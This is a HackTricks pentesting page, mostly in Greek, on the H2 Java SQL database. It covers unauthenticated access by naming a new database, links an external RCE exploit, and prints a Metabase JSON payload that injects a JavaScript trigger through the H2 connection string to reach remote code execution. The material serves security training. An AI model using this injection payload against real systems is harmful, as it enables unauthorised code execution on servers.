hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md

4.3 KiB
Raw Blame History

H2 - Java SQL database

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Official page: https://www.h2database.com/html/main.html

Access

Μπορείτε να υποδείξετε ένα ανύπαρκτο όνομα βάσης δεδομένων προκειμένου να δημιουργήσετε μια νέα βάση δεδομένων χωρίς έγκυρα διαπιστευτήρια (μη αυθεντικοποιημένος):

Ή αν γνωρίζετε ότι για παράδειγμα τρέχει μια mysql και γνωρίζετε το όνομα της βάσης δεδομένων και τα διαπιστευτήρια για αυτή τη βάση δεδομένων, μπορείτε απλά να αποκτήσετε πρόσβαση:

Trick from box Hawk of HTB.

RCE

Έχοντας πρόσβαση για να επικοινωνήσετε με τη βάση δεδομένων H2, ελέγξτε αυτό το exploit για να αποκτήσετε RCE σε αυτήν: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL Injection to RCE

Σε αυτή την ανάρτηση εξηγείται ένα payload για να αποκτήσετε RCE μέσω μιας βάσης δεδομένων H2 εκμεταλλευόμενοι μια SQL Injection.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks
{% endhint %}